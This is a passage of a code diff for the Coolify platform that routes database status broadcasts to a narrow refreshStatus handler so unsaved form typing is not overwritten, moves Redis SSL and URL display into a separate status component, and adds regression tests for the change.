                 $restoreCommand = $this->mariadbRestoreCommand;
                 if ($this->dumpAll) {
@@ -779,7 +781,7 @@ public function buildRestoreCommand(string $tmpPath): string
                     $restoreCommand .= " < {$tmpPath}";
                 }
                 break;
-            case \App\Models\StandaloneMysql::class:
+            case StandaloneMysql::class:
             case 'mysql':
                 $restoreCommand = $this->mysqlRestoreCommand;
                 if ($this->dumpAll) {
@@ -788,7 +790,7 @@ public function buildRestoreCommand(string $tmpPath): string
                     $restoreCommand .= " < {$tmpPath}";
                 }
                 break;
-            case \App\Models\StandalonePostgresql::class:
+            case StandalonePostgresql::class:
             case 'postgresql':
                 $restoreCommand = $this->postgresqlRestoreCommand;
                 if ($this->dumpAll) {
@@ -797,7 +799,7 @@ public function buildRestoreCommand(string $tmpPath): string
                     $restoreCommand .= " {$tmpPath}";
                 }
                 break;
-            case \App\Models\StandaloneMongodb::class:
+            case StandaloneMongodb::class:
             case 'mongodb':
                 $restoreCommand = $this->mongodbRestoreCommand;
                 if ($this->dumpAll === false) {
diff --git a/app/Livewire/Project/Database/Keydb/General.php b/app/Livewire/Project/Database/Keydb/General.php
index 7c8808499..0511c9d04 100644
--- a/app/Livewire/Project/Database/Keydb/General.php
+++ b/app/Livewire/Project/Database/Keydb/General.php
@@ -59,11 +59,22 @@ public function getListeners()
 
         return [
             "echo-private:team.{$teamId},DatabaseProxyStopped" => 'databaseProxyStopped',
-            "echo-private:user.{$userId},DatabaseStatusChanged" => 'refresh',
-            "echo-private:team.{$teamId},ServiceChecked" => 'refresh',
+            // Broadcasts go to refreshStatus, which only writes display-only properties.
+            // Never wire status broadcasts to a handler that touches text-input properties —
+            // it clobbers in-progress typing every 10s. See coolify#6062 / #6354 / #9695.
+            "echo-private:user.{$userId},DatabaseStatusChanged" => 'refreshStatus',
+            "echo-private:team.{$teamId},ServiceChecked" => 'refreshStatus',
         ];
     }
 
+    public function refreshStatus(): void
+    {
+        $this->database->refresh();
+        $this->dbUrl = $this->database->internal_db_url;
+        $this->dbUrlPublic = $this->database->external_db_url;
+        $this->certificateValidUntil = $this->database->sslCertificates()->first()?->valid_until;
+    }
+
     public function mount()
     {
         try {
diff --git a/app/Livewire/Project/Database/Mariadb/General.php b/app/Livewire/Project/Database/Mariadb/General.php
index ea6d902e7..edd02eb95 100644
--- a/app/Livewire/Project/Database/Mariadb/General.php
+++ b/app/Livewire/Project/Database/Mariadb/General.php
@@ -64,11 +64,22 @@ public function getListeners()
         $teamId = Auth::user()->currentTeam()->id;
 
         return [
-            "echo-private:user.{$userId},DatabaseStatusChanged" => 'refresh',
-            "echo-private:team.{$teamId},ServiceChecked" => 'refresh',
+            // Broadcasts go to refreshStatus, which only writes display-only properties.
+            // Never wire status broadcasts to a handler that touches text-input properties —
+            // it clobbers in-progress typing every 10s. See coolify#6062 / #6354 / #9695.
+            "echo-private:user.{$userId},DatabaseStatusChanged" => 'refreshStatus',
+            "echo-private:team.{$teamId},ServiceChecked" => 'refreshStatus',
         ];
     }
 
+    public function refreshStatus(): void
+    {
+        $this->database->refresh();
+        $this->db_url = $this->database->internal_db_url;
+        $this->db_url_public = $this->database->external_db_url;
+        $this->certificateValidUntil = $this->database->sslCertificates()->first()?->valid_until;
+    }
+
     protected function rules(): array
     {
         return [
diff --git a/app/Livewire/Project/Database/Mongodb/General.php b/app/Livewire/Project/Database/Mongodb/General.php
index 3af4b0b2a..1b5a62d2f 100644
--- a/app/Livewire/Project/Database/Mongodb/General.php
+++ b/app/Livewire/Project/Database/Mongodb/General.php
@@ -64,11 +64,22 @@ public function getListeners()
         $teamId = Auth::user()->currentTeam()->id;
 
         return [
-            "echo-private:user.{$userId},DatabaseStatusChanged" => 'refresh',
-            "echo-private:team.{$teamId},ServiceChecked" => 'refresh',
+            // Broadcasts go to refreshStatus, which only writes display-only properties.
+            // Never wire status broadcasts to a handler that touches text-input properties —
+            // it clobbers in-progress typing every 10s. See coolify#6062 / #6354 / #9695.
+            "echo-private:user.{$userId},DatabaseStatusChanged" => 'refreshStatus',
+            "echo-private:team.{$teamId},ServiceChecked" => 'refreshStatus',
         ];
     }
 
+    public function refreshStatus(): void
+    {
+        $this->database->refresh();
+        $this->db_url = $this->database->internal_db_url;
+        $this->db_url_public = $this->database->external_db_url;
+        $this->certificateValidUntil = $this->database->sslCertificates()->first()?->valid_until;
+    }
+
     protected function rules(): array
     {
         return [
diff --git a/app/Livewire/Project/Database/Mysql/General.php b/app/Livewire/Project/Database/Mysql/General.php
index 34726bd0a..6e1e55b3f 100644
--- a/app/Livewire/Project/Database/Mysql/General.php
+++ b/app/Livewire/Project/Database/Mysql/General.php
@@ -66,11 +66,22 @@ public function getListeners()
         $teamId = Auth::user()->currentTeam()->id;
 
         return [
-            "echo-private:user.{$userId},DatabaseStatusChanged" => 'refresh',
-            "echo-private:team.{$teamId},ServiceChecked" => 'refresh',
+            // Broadcasts go to refreshStatus, which only writes display-only properties.
+            // Never wire status broadcasts to a handler that touches text-input properties —
+            // it clobbers in-progress typing every 10s. See coolify#6062 / #6354 / #9695.
+            "echo-private:user.{$userId},DatabaseStatusChanged" => 'refreshStatus',
+            "echo-private:team.{$teamId},ServiceChecked" => 'refreshStatus',
         ];
     }
 
+    public function refreshStatus(): void
+    {
+        $this->database->refresh();
+        $this->db_url = $this->database->internal_db_url;
+        $this->db_url_public = $this->database->external_db_url;
+        $this->certificateValidUntil = $this->database->sslCertificates()->first()?->valid_until;
+    }
+
     protected function rules(): array
     {
         return [
diff --git a/app/Livewire/Project/Database/Postgresql/General.php b/app/Livewire/Project/Database/Postgresql/General.php
index b5fb85483..1b36ac28a 100644
--- a/app/Livewire/Project/Database/Postgresql/General.php
+++ b/app/Livewire/Project/Database/Postgresql/General.php
@@ -74,13 +74,24 @@ public function getListeners()
         $teamId = Auth::user()->currentTeam()->id;
 
         return [
-            "echo-private:user.{$userId},DatabaseStatusChanged" => 'refresh',
-            "echo-private:team.{$teamId},ServiceChecked" => 'refresh',
+            // Broadcasts go to refreshStatus, which only writes display-only properties.
+            // Never wire status broadcasts to a handler that touches text-input properties —
+            // it clobbers in-progress typing every 10s. See coolify#6062 / #6354 / #9695.
+            "echo-private:user.{$userId},DatabaseStatusChanged" => 'refreshStatus',
+            "echo-private:team.{$teamId},ServiceChecked" => 'refreshStatus',
             'save_init_script',
             'delete_init_script',
         ];
     }
 
+    public function refreshStatus(): void
+    {
+        $this->database->refresh();
+        $this->db_url = $this->database->internal_db_url;
+        $this->db_url_public = $this->database->external_db_url;
+        $this->certificateValidUntil = $this->database->sslCertificates()->first()?->valid_until;
+    }
+
     protected function rules(): array
     {
         return [
diff --git a/app/Livewire/Project/Database/Redis/General.php b/app/Livewire/Project/Database/Redis/General.php
index c3cc43972..aff7b7afa 100644
--- a/app/Livewire/Project/Database/Redis/General.php
+++ b/app/Livewire/Project/Database/Redis/General.php
@@ -4,14 +4,11 @@
 
 use App\Actions\Database\StartDatabaseProxy;
 use App\Actions\Database\StopDatabaseProxy;
-use App\Helpers\SslHelper;
 use App\Models\Server;
 use App\Models\StandaloneRedis;
 use App\Support\ValidationPatterns;
-use Carbon\Carbon;
 use Exception;
 use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
-use Illuminate\Support\Facades\Auth;
 use Livewire\Component;
 
 class General extends Component
@@ -48,25 +45,9 @@ class General extends Component
 
     public string $redisVersion;
 
-    public ?string $dbUrl = null;
-
-    public ?string $dbUrlPublic = null;
-
-    public bool $enableSsl = false;
-
-    public ?Carbon $certificateValidUntil = null;
-
-    public function getListeners()
-    {
-        $userId = Auth::id();
-        $teamId = Auth::user()->currentTeam()->id;
-
-        return [
-            "echo-private:user.{$userId},DatabaseStatusChanged" => 'refresh',
-            "echo-private:team.{$teamId},ServiceChecked" => 'refresh',
-            'envsUpdated' => 'refresh',
-        ];
-    }
+    protected $listeners = [
+        'envsUpdated' => 'refresh',
+    ];
 
     protected function rules(): array
     {
@@ -87,7 +68,6 @@ protected function rules(): array
             'redisPassword' => ValidationPatterns::databasePasswordRules(
                 enforcePattern: $this->redisPassword !== $this->database->redis_password,
             ),
-            'enableSsl' => 'boolean',
         ];
     }
 
@@ -122,7 +102,6 @@ protected function messages(): array
         'customDockerRunOptions' => 'Custom Docker Options',
         'redisUsername' => 'Redis Username',
         'redisPassword' => 'Redis Password',
-        'enableSsl' => 'Enable SSL',
     ];
 
     public function mount()
@@ -136,12 +115,6 @@ public function mount()
 
                 return;
             }
-
-            $existingCert = $this->database->sslCertificates()->first();
-
-            if ($existingCert) {
-                $this->certificateValidUntil = $existingCert->valid_until;
-            }
         } catch (\Throwable $e) {
             return handleError($e, $this);
         }
@@ -161,11 +134,7 @@ public function syncData(bool $toModel = false)
             $this->database->public_port_timeout = $this->publicPortTimeout ?: null;
             $this->database->is_log_drain_enabled = $this->isLogDrainEnabled;
             $this->database->custom_docker_run_options = $this->customDockerRunOptions;
-            $this->database->enable_ssl = $this->enableSsl;
             $this->database->save();
-
-            $this->dbUrl = $this->database->internal_db_url;
-            $this->dbUrlPublic = $this->database->external_db_url;
         } else {
             $this->name = $this->database->name;
             $this->description = $this->database->description;
@@ -177,9 +146,6 @@ public function syncData(bool $toModel = false)
             $this->publicPortTimeout = $this->database->public_port_timeout;
             $this->isLogDrainEnabled = $this->database->is_log_drain_enabled;
             $this->customDockerRunOptions = $this->database->custom_docker_run_options;
-            $this->enableSsl = $this->database->enable_ssl;
-            $this->dbUrl = $this->database->internal_db_url;
-            $this->dbUrlPublic = $this->database->external_db_url;
             $this->redisVersion = $this->database->getRedisVersion();
             $this->redisUsername = $this->database->redis_username;
             $this->redisPassword = $this->database->redis_password;
@@ -227,6 +193,7 @@ public function submit()
             );
 
             $this->dispatch('success', 'Database updated.');
+            $this->dispatch('databaseUpdated');
         } catch (Exception $e) {
             return handleError($e, $this);
         } finally {
@@ -259,6 +226,7 @@ public function instantSave()
                 StopDatabaseProxy::run($this->database);
                 $this->dispatch('success', 'Database is no longer publicly accessible.');
             }
+            $this->dispatch('databaseUpdated');
         } catch (\Throwable $e) {
             $this->isPublic = ! $this->isPublic;
             $this->syncData(true);
@@ -267,63 +235,6 @@ public function instantSave()
         }
     }
 
-    public function instantSaveSSL()
-    {
-        try {
-            $this->authorize('update', $this->database);
-
-            $this->syncData(true);
-            $this->dispatch('success', 'SSL configuration updated.');
-        } catch (Exception $e) {
-            return handleError($e, $this);
-        }
-    }
-
-    public function regenerateSslCertificate()
-    {
-        try {
-            $this->authorize('update', $this->database);
-
-            $existingCert = $this->database->sslCertificates()->first();
-
-            if (! $existingCert) {
-                $this->dispatch('error', 'No existing SSL certificate found for this database.');
-
-                return;
-            }
-
-            $caCert = $this->server->sslCertificates()->where('is_ca_certificate', true)->first();
-
-            if (! $caCert) {
-                $this->server->generateCaCertificate();
-                $caCert = $this->server->sslCertificates()->where('is_ca_certificate', true)->first();
-            }
-
-            if (! $caCert) {
-                $this->dispatch('error', 'No CA certificate found for this database. Please generate a CA certificate for this server in the server/advanced page.');
-
-                return;
-            }
-
-            SslHelper::generateSslCertificate(
-                commonName: $existingCert->common_name,
-                subjectAlternativeNames: $existingCert->subject_alternative_names ?? [],
-                resourceType: $existingCert->resource_type,
-                resourceId: $existingCert->resource_id,
-                serverId: $existingCert->server_id,
-                caCert: $caCert->ssl_certificate,
-                caKey: $caCert->ssl_private_key,
-                configurationDir: $existingCert->configuration_dir,
-                mountPath: $existingCert->mount_path,
-                isPemKeyFileRequired: true,
-            );
-
-            $this->dispatch('success', 'SSL certificates regenerated. Restart database to apply changes.');
-        } catch (Exception $e) {
-            handleError($e, $this);
-        }
-    }
-
     public function refresh(): void
     {
         $this->database->refresh();
diff --git a/app/Livewire/Project/Database/Redis/StatusInfo.php b/app/Livewire/Project/Database/Redis/StatusInfo.php
new file mode 100644
index 000000000..183ed936f
--- /dev/null
+++ b/app/Livewire/Project/Database/Redis/StatusInfo.php
@@ -0,0 +1,116 @@
+<?php
+
+namespace App\Livewire\Project\Database\Redis;
+
+use App\Helpers\SslHelper;
+use App\Models\StandaloneRedis;
+use Carbon\Carbon;
+use Exception;
+use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
+use Illuminate\Support\Facades\Auth;
+use Livewire\Component;
+
+class StatusInfo extends Component
+{
+    use AuthorizesRequests;
+
+    public StandaloneRedis $database;
+
+    public bool $enableSsl = false;
+
+    public ?Carbon $certificateValidUntil = null;
+
+    public ?string $dbUrl = null;
+
+    public ?string $dbUrlPublic = null;
+
+    public function getListeners()
+    {
+        $userId = Auth::id();
+        $teamId = Auth::user()->currentTeam()->id;
+
+        return [
+            "echo-private:user.{$userId},DatabaseStatusChanged" => 'refresh',
+            "echo-private:team.{$teamId},ServiceChecked" => 'refresh',
+            'databaseUpdated' => 'refresh',
+        ];
+    }
+
+    public function mount(): void
+    {
+        $this->refresh();
+    }
+
+    public function refresh(): void
+    {
+        $this->database->refresh();
+        $this->enableSsl = (bool) $this->database->enable_ssl;
+        $this->dbUrl = $this->database->internal_db_url;
+        $this->dbUrlPublic = $this->database->external_db_url;
+        $this->certificateValidUntil = $this->database->sslCertificates()->first()?->valid_until;
+    }
+
+    public function instantSaveSSL(): void
+    {
+        try {
+            $this->authorize('update', $this->database);
+            $this->database->enable_ssl = $this->enableSsl;
+            $this->database->save();
+            $this->dispatch('success', 'SSL configuration updated.');
+        } catch (Exception $e) {
+            handleError($e, $this);
+        }
+    }
+
+    public function regenerateSslCertificate(): void
+    {
+        try {
+            $this->authorize('update', $this->database);
+
+            $existingCert = $this->database->sslCertificates()->first();
+
+            if (! $existingCert) {
+                $this->dispatch('error', 'No existing SSL certificate found for this database.');
+
+                return;
+            }
+
+            $server = $this->database->destination->server;
+            $caCert = $server->sslCertificates()->where('is_ca_certificate', true)->first();
+
+            if (! $caCert) {
+                $server->generateCaCertificate();
+                $caCert = $server->sslCertificates()->where('is_ca_certificate', true)->first();
+            }
+
+            if (! $caCert) {
+                $this->dispatch('error', 'No CA certificate found for this database. Please generate a CA certificate for this server in the server/advanced page.');
+
+                return;
+            }
+
+            SslHelper::generateSslCertificate(
+                commonName: $existingCert->common_name,
+                subjectAlternativeNames: $existingCert->subject_alternative_names ?? [],
+                resourceType: $existingCert->resource_type,
+                resourceId: $existingCert->resource_id,
+                serverId: $existingCert->server_id,
+                caCert: $caCert->ssl_certificate,
+                caKey: $caCert->ssl_private_key,
+                configurationDir: $existingCert->configuration_dir,
+                mountPath: $existingCert->mount_path,
+                isPemKeyFileRequired: true,
+            );
+
+            $this->refresh();
+            $this->dispatch('success', 'SSL certificates regenerated. Restart database to apply changes.');
+        } catch (Exception $e) {
+            handleError($e, $this);
+        }
+    }
+
+    public function render()
+    {
+        return view('livewire.project.database.redis.status-info');
+    }
+}
diff --git a/app/Livewire/Project/Service/Configuration.php b/app/Livewire/Project/Service/Configuration.php
index 2d69ceb12..ac2b39bb8 100644
--- a/app/Livewire/Project/Service/Configuration.php
+++ b/app/Livewire/Project/Service/Configuration.php
@@ -4,7 +4,6 @@
 
 use App\Models\Service;
 use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
-use Illuminate\Support\Facades\Auth;
 use Livewire\Component;
 
 class Configuration extends Component
@@ -27,16 +26,10 @@ class Configuration extends Component
 
     public array $parameters;
 
-    public function getListeners()
-    {
-        $teamId = Auth::user()->currentTeam()->id;
-
-        return [
-            "echo-private:team.{$teamId},ServiceChecked" => 'serviceChecked',
-            'refreshServices' => 'refreshServices',
-            'refresh' => 'refreshServices',
-        ];
-    }
+    protected $listeners = [
+        'refreshServices' => 'refreshServices',
+        'refresh' => 'refreshServices',
+    ];
 
     public function render()
     {
@@ -105,18 +98,4 @@ public function restartDatabase($id)
             return handleError($e, $this);
         }
     }
-
-    public function serviceChecked()
-    {
-        try {
-            $this->service->applications->each(function ($application) {
-                $application->refresh();
-            });
-            $this->service->databases->each(function ($database) {
-                $database->refresh();
-            });
-        } catch (\Exception $e) {
-            return handleError($e, $this);
-        }
-    }
 }
diff --git a/app/Livewire/Server/Sentinel.php b/app/Livewire/Server/Sentinel.php
index a4b35891b..06aebd8f8 100644
--- a/app/Livewire/Server/Sentinel.php
+++ b/app/Livewire/Server/Sentinel.php
@@ -93,7 +93,9 @@ public function handleSentinelRestarted($event)
     {
         if ($event['serverUuid'] === $this->server->uuid) {
             $this->server->refresh();
-            $this->syncData();
+            // Only refresh display-only state; never re-sync text-input properties
+            // (would clobber any unsaved typing — see coolify#6062 / #6354 / #9695).
+            $this->sentinelUpdatedAt = $this->server->sentinel_updated_at;
             $this->dispatch('success', 'Sentinel has been restarted successfully.');
         }
     }
diff --git a/app/Livewire/Server/Show.php b/app/Livewire/Server/Show.php
index 3e05d9306..d7339dcdb 100644
--- a/app/Livewire/Server/Show.php
+++ b/app/Livewire/Server/Show.php
@@ -277,7 +277,9 @@ public function handleSentinelRestarted($event)
         // Only refresh if the event is for this server
         if (isset($event['serverUuid']) && $event['serverUuid'] === $this->server->uuid) {
             $this->server->refresh();
-            $this->syncData();
+            // Only refresh display-only state; never re-sync text-input properties
+            // (would clobber any unsaved typing — see coolify#6062 / #6354 / #9695).
+            $this->sentinelUpdatedAt = $this->server->sentinel_updated_at;
             $this->dispatch('success', 'Sentinel has been restarted successfully.');
         }
     }
@@ -457,12 +459,15 @@ public function handleServerValidated($event = null)
             return;
         }
 
-        // Refresh server data
+        // Refresh server data and only the display-only state that validation produces.
+        // Never re-sync text-input properties via syncData() — would clobber any
+        // unsaved typing (see coolify#6062 / #6354 / #9695).
         $this->server->refresh();
-        $this->syncData();
-
-        // Update validation state
+        $this->server->settings->refresh();
         $this->isValidating = $this->server->is_validating ?? false;
+        $this->validationLogs = $this->server->validation_logs;
+        $this->isReachable = $this->server->settings->is_reachable;
+        $this->isUsable = $this->server->settings->is_usable;
 
         // Reload Hetzner tokens in case the linking section should now be shown
         $this->loadHetznerTokens();
diff --git a/resources/views/livewire/project/database/redis/general.blade.php b/resources/views/livewire/project/database/redis/general.blade.php
index 73ee5f0e5..b72b05ff6 100644
--- a/resources/views/livewire/project/database/redis/general.blade.php
+++ b/resources/views/livewire/project/database/redis/general.blade.php
@@ -60,56 +60,8 @@
                     helper="A comma separated list of ports you would like to map to the host system.<br><span class='inline-block font-bold dark:text-warning'>Example</span>3000:5432,3002:5433"
                     canGate="update" :canResource="$database" />
             </div>
-            <x-forms.input label="Redis URL (internal)"
-                helper="If you change the user/password/port, this could be different. This is with the default values."
-                type="password" readonly wire:model="dbUrl" canGate="update" :canResource="$database" />
-            @if ($dbUrlPublic)
-                <x-forms.input label="Redis URL (public)"
-                    helper="If you change the user/password/port, this could be different. This is with the default values."
-                    type="password" readonly wire:model="dbUrlPublic" canGate="update" :canResource="$database" />
-            @endif
-        </div>
-        <div class="flex flex-col gap-2">
-            <div class="flex items-center justify-between py-2">
-                <div class="flex items-center justify-between w-full">
-                    <h3>SSL Configuration</h3>
-                    @if ($enableSsl && $certificateValidUntil)
-                        <x-modal-confirmation title="Regenerate SSL Certificates"
-                            buttonTitle="Regenerate SSL Certificates" :actions="[
-                                'The SSL certificate of this database will be regenerated.',
-                                'You must restart the database after regenerating the certificate to start using the new certificate.',
-                            ]"
-                            submitAction="regenerateSslCertificate" :confirmWithText="false" :confirmWithPassword="false" />
-                    @endif
-                </div>
-            </div>
-            @if ($enableSsl && $certificateValidUntil)
-                <span class="text-sm">Valid until:
-                    @if (now()->gt($certificateValidUntil))
-                        <span class="text-red-500">{{ $certificateValidUntil->format('d.m.Y H:i:s') }} - Expired</span>
-                    @elseif(now()->addDays(30)->gt($certificateValidUntil))
-                        <span class="text-red-500">{{ $certificateValidUntil->format('d.m.Y H:i:s') }} - Expiring
-                            soon</span>
-                    @else
-                        <span>{{ $certificateValidUntil->format('d.m.Y H:i:s') }}</span>
-                    @endif
-                </span>
-            @endif
-            <div class="flex flex-col gap-2">
-                <div class="w-64" wire:key='enable_ssl'>
-                    @if (str($database->status)->contains('exited'))
-                        <x-forms.checkbox id="enableSsl" label="Enable SSL"
-                            wire:model.live="enableSsl" instantSave="instantSaveSSL" canGate="update"
-                            :canResource="$database" />
-                    @else
-                        <x-forms.checkbox id="enableSsl" label="Enable SSL"
-                            wire:model.live="enableSsl" instantSave="instantSaveSSL" disabled
-                            helper="Database should be stopped to change this settings." canGate="update"
-                            :canResource="$database" />
-                    @endif
-                </div>
-            </div>
         </div>
+        <livewire:project.database.redis.status-info :database="$database" />
         <div>
             <div class="flex flex-col py-2 w-64">
                 <div class="flex items-center gap-2 pb-2">
diff --git a/resources/views/livewire/project/database/redis/status-info.blade.php b/resources/views/livewire/project/database/redis/status-info.blade.php
new file mode 100644
index 000000000..9f329504c
--- /dev/null
+++ b/resources/views/livewire/project/database/redis/status-info.blade.php
@@ -0,0 +1,51 @@
+<div class="flex flex-col gap-2">
+    <x-forms.input label="Redis URL (internal)"
+        helper="If you change the user/password/port, this could be different. This is with the default values."
+        type="password" readonly wire:model="dbUrl" canGate="update" :canResource="$database" />
+    @if ($dbUrlPublic)
+        <x-forms.input label="Redis URL (public)"
+            helper="If you change the user/password/port, this could be different. This is with the default values."
+            type="password" readonly wire:model="dbUrlPublic" canGate="update" :canResource="$database" />
+    @endif
+    <div class="flex flex-col gap-2 pt-4">
+        <div class="flex items-center justify-between py-2">
+            <div class="flex items-center justify-between w-full">
+                <h3>SSL Configuration</h3>
+                @if ($enableSsl && $certificateValidUntil)
+                    <x-modal-confirmation title="Regenerate SSL Certificates"
+                        buttonTitle="Regenerate SSL Certificates" :actions="[
+                            'The SSL certificate of this database will be regenerated.',
+                            'You must restart the database after regenerating the certificate to start using the new certificate.',
+                        ]"
+                        submitAction="regenerateSslCertificate" :confirmWithText="false" :confirmWithPassword="false" />
+                @endif
+            </div>
+        </div>
+        @if ($enableSsl && $certificateValidUntil)
+            <span class="text-sm">Valid until:
+                @if (now()->gt($certificateValidUntil))
+                    <span class="text-red-500">{{ $certificateValidUntil->format('d.m.Y H:i:s') }} - Expired</span>
+                @elseif(now()->addDays(30)->gt($certificateValidUntil))
+                    <span class="text-red-500">{{ $certificateValidUntil->format('d.m.Y H:i:s') }} - Expiring
+                        soon</span>
+                @else
+                    <span>{{ $certificateValidUntil->format('d.m.Y H:i:s') }}</span>
+                @endif
+            </span>
+        @endif
+        <div class="flex flex-col gap-2">
+            <div class="w-64" wire:key='enable_ssl'>
+                @if (str($database->status)->contains('exited'))
+                    <x-forms.checkbox id="enableSsl" label="Enable SSL"
+                        wire:model.live="enableSsl" instantSave="instantSaveSSL" canGate="update"
+                        :canResource="$database" />
+                @else
+                    <x-forms.checkbox id="enableSsl" label="Enable SSL"
+                        wire:model.live="enableSsl" instantSave="instantSaveSSL" disabled
+                        helper="Database should be stopped to change this settings." canGate="update"
+                        :canResource="$database" />
+                @endif
+            </div>
+        </div>
+    </div>
+</div>
diff --git a/tests/Feature/DatabaseSslStatusRefreshTest.php b/tests/Feature/DatabaseSslStatusRefreshTest.php
index e62ef48ad..b663213a5 100644
--- a/tests/Feature/DatabaseSslStatusRefreshTest.php
+++ b/tests/Feature/DatabaseSslStatusRefreshTest.php
@@ -7,11 +7,16 @@
 use App\Livewire\Project\Database\Mysql\General as MysqlGeneral;
 use App\Livewire\Project\Database\Postgresql\General as PostgresqlGeneral;
 use App\Livewire\Project\Database\Redis\General as RedisGeneral;
+use App\Livewire\Project\Database\Redis\StatusInfo as RedisStatusInfo;
+use App\Livewire\Server\Sentinel;
+use App\Livewire\Server\Show;
 use App\Models\Environment;
 use App\Models\Project;
 use App\Models\Server;
 use App\Models\StandaloneDocker;
 use App\Models\StandaloneMysql;
+use App\Models\StandalonePostgresql;
+use App\Models\StandaloneRedis;
 use App\Models\Team;
 use App\Models\User;
 use Illuminate\Foundation\Testing\RefreshDatabase;
@@ -28,25 +33,75 @@
     session(['currentTeam' => $this->team]);
 });
 
-dataset('ssl-aware-database-general-components', [
+dataset('database-general-forms-without-broadcasts', [
+    // Redis splits status-derived display into a sibling component; the form itself
+    // takes no broadcast listeners. Other DBs use the narrower refreshStatus pattern below.
+    RedisGeneral::class,
+]);
+
+dataset('database-general-forms-with-narrow-refresh', [
+    // Form listens to status broadcasts but routes them to refreshStatus, which only
+    // writes display-only properties (URLs, cert expiry) — never input-bound text fields.
+    PostgresqlGeneral::class,
     MysqlGeneral::class,
     MariadbGeneral::class,
     MongodbGeneral::class,
-    RedisGeneral::class,
-    PostgresqlGeneral::class,
     KeydbGeneral::class,
     DragonflyGeneral::class,
 ]);
 
-it('maps database status broadcasts to refresh for ssl-aware database general components', function (string $componentClass) {
-    $component = app($componentClass);
-    $listeners = $component->getListeners();
+dataset('database-status-info-components', [
+    RedisStatusInfo::class,
+]);
 
-    expect($listeners["echo-private:user.{$this->user->id},DatabaseStatusChanged"])->toBe('refresh')
-        ->and($listeners["echo-private:team.{$this->team->id},ServiceChecked"])->toBe('refresh');
-})->with('ssl-aware-database-general-components');
+it('does not subscribe the form to status broadcasts when display lives in a sibling', function (string $componentClass) {
+    // Regression guard for coolify#6062 / #6354 / #9695:
+    // For DBs whose status-derived display moved into a sibling component, the form
+    // itself must not subscribe to status broadcasts at all.
+    $listeners = resolveLivewireListeners(app($componentClass));
 
-it('reloads the mysql database model when refreshing so ssl controls follow the latest status', function () {
+    expect($listeners)
+        ->not->toHaveKey("echo-private:user.{$this->user->id},DatabaseStatusChanged")
+        ->not->toHaveKey("echo-private:team.{$this->team->id},ServiceChecked")
+        ->not->toHaveKey("echo-private:team.{$this->team->id},ServiceStatusChanged");
+})->with('database-general-forms-without-broadcasts');
+
+it('routes status broadcasts to refreshStatus, never to a handler that re-syncs inputs', function (string $componentClass) {
+    // Regression guard for coolify#6062 / #6354 / #9695:
+    // The form may listen to broadcasts, but only to a narrow handler (refreshStatus)
+    // that touches display-only properties. Routing to `refresh` or `$refresh` would
+    // re-sync every input property from the DB and wipe in-progress typing.
+    $listeners = resolveLivewireListeners(app($componentClass));
+
+    $databaseStatusKey = "echo-private:user.{$this->user->id},DatabaseStatusChanged";
+    $serviceCheckedKey = "echo-private:team.{$this->team->id},ServiceChecked";
+
+    expect($listeners[$databaseStatusKey] ?? null)->toBe('refreshStatus')
+        ->and($listeners[$serviceCheckedKey] ?? null)->toBe('refreshStatus');
+})->with('database-general-forms-with-narrow-refresh');
+
+function resolveLivewireListeners(object $component): array
+{
+    // Livewire's HandlesEvents trait declares getListeners() as protected,
+    // so subclasses that override it as public are callable directly, but
+    // subclasses that rely on $listeners are not. Reflection handles both.
+    $method = new ReflectionMethod($component, 'getListeners');
+    $method->setAccessible(true);
+
+    return (array) $method->invoke($component);
+}
+
+it('auto-refreshes status-info sibling on database status broadcasts', function (string $componentClass) {
+    // Status-derived display (connection URLs, SSL gate hint, cert expiry) lives in a sibling
+    // Livewire component so it can re-render on broadcasts without touching the form's DOM.
+    $listeners = resolveLivewireListeners(app($componentClass));
+
+    expect($listeners)
+        ->toHaveKey("echo-private:user.{$this->user->id},DatabaseStatusChanged")
+        ->toHaveKey("echo-private:team.{$this->team->id},ServiceChecked");
+})->with('database-status-info-components');
+
+it('reloads the mysql database model when refresh is called directly so ssl controls follow the latest status', function () {
     $server = Server::factory()->create(['team_id' => $this->team->id]);
     $destination = StandaloneDocker::where('server_id', $server->id)->first();
     $project = Project::factory()->create(['team_id' => $this->team->id]);
@@ -75,3 +130,91 @@
     $component->call('refresh')
         ->assertSee('Database should be stopped to change this settings.');
 });
+
+it('does not clobber server form text inputs when sentinel restarts', function () {
+    $server = Server::factory()->create([
+        'team_id' => $this->team->id,
+        'name' => 'persisted-server-name',
+    ]);
+
+    $component = Livewire::test(Sentinel::class, ['server_uuid' => $server->uuid])
+        ->set('sentinelToken', 'user-was-typing-this-token');
+
+    $component->call('handleSentinelRestarted', ['serverUuid' => $server->uuid]);
+
+    expect($component->get('sentinelToken'))->toBe('user-was-typing-this-token');
+});
+
+it('does not clobber server form text inputs when server validation completes', function () {
+    $server = Server::factory()->create([
+        'team_id' => $this->team->id,
+        'name' => 'persisted-server-name',
+    ]);
+
+    $component = Livewire::test(Show::class, ['server_uuid' => $server->uuid])
+        ->set('name', 'user-was-typing-here')
+        ->set('ip', '203.0.113.42');
+
+    $component->call('handleServerValidated', ['serverUuid' => $server->uuid]);
+
+    expect($component->get('name'))->toBe('user-was-typing-here')
+        ->and($component->get('ip'))->toBe('203.0.113.42');
+});
+
+it('preserves typed input on the postgres form when refreshStatus runs', function () {
+    $server = Server::factory()->create(['team_id' => $this->team->id]);
+    $destination = StandaloneDocker::where('server_id', $server->id)->first();
+    $project = Project::factory()->create(['team_id' => $this->team->id]);
+    $environment = Environment::factory()->create(['project_id' => $project->id]);
+
+    $database = StandalonePostgresql::create([
+        'name' => 'persisted-name',
+        'image' => 'postgres:16',
+        'postgres_user' => 'postgres',
+        'postgres_password' => 'password',
+        'postgres_db' => 'postgres',
+        'status' => 'exited:unhealthy',
+        'enable_ssl' => false,
+        'is_log_drain_enabled' => false,
+        'environment_id' => $environment->id,
+        'destination_id' => $destination->id,
+        'destination_type' => $destination->getMorphClass(),
+    ]);
+
+    $component = Livewire::test(PostgresqlGeneral::class, ['database' => $database])
+        ->set('name', 'user-was-typing-here')
+        ->set('portsMappings', '5433:5432');
+
+    $component->call('refreshStatus');
+
+    expect($component->get('name'))->toBe('user-was-typing-here')
+        ->and($component->get('portsMappings'))->toBe('5433:5432');
+});
+
+it('shows the redis ssl gate hint after the sibling is refreshed', function () {
+    $server = Server::factory()->create(['team_id' => $this->team->id]);
+    $destination = StandaloneDocker::where('server_id', $server->id)->first();
+    $project = Project::factory()->create(['team_id' => $this->team->id]);
+    $environment = Environment::factory()->create(['project_id' => $project->id]);
+
+    $database = StandaloneRedis::create([
